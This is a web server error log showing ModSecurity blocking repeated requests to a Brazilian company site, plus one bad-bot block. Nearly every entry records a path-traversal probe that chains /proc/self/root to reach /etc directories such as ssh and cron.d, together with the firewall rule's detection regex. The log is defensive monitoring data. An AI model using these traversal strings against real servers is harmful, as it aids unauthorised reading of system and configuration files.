[Mon Mar 16 17:44:43.099808 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.241.46:37090] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhru1ajLEzk2WiQ-10smgAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:44.455468 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:37098] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrvP9ocpUE4ed4uDwM1gAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:45.669499 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.241.46:37104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrvdSswJuvopo3lOh5TAAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:46.971617 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:37120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrvrABkC4fWIHEf8EPUAAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:49.331607 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:46044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrwbABkC4fWIHEf8EPUwAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:54.427885 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:46060] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrxrABkC4fWIHEf8EPVwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:56.803083 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.244.31:59834] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhryFajLEzk2WiQ-10srgAAApY"]
[Mon Mar 16 17:44:58.007471 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.241.46:46068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrytSswJuvopo3lOh5VAAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:44:59.844851 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:48550] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhry46lpbStxTqkSkuDuwAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:01.237191 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.241.46:48560] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhrzaTCbgAP5jq5TehFqAAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:06.799819 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:48564] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr0tSswJuvopo3lOh5WwAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:08.146612 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:39232] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr1LABkC4fWIHEf8EPXQAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:14.587466 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.241.46:39242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr2o6lpbStxTqkSkuDxgAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:16.714519 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:39256] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr29SswJuvopo3lOh5YgAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:20.407448 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:49154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr4KTCbgAP5jq5TehFtAAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:21.710973 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.241.46:49164] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr4Ur9dMAiw-8KANNjawAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:23.916152 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:49180] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr47ABkC4fWIHEf8EPYwAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:29.930559 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.241.46:49190] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr6Ur9dMAiw-8KANNjbwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:32.309114 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:41058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr7KQpVkWug9HeOt9OZwAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:33.602964 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:41066] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr7bABkC4fWIHEf8EPZQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:40.398347 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:59880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr9LysWC90G-1nBrBeqgAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:40.412305 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:41076] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr9LABkC4fWIHEf8EPawAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
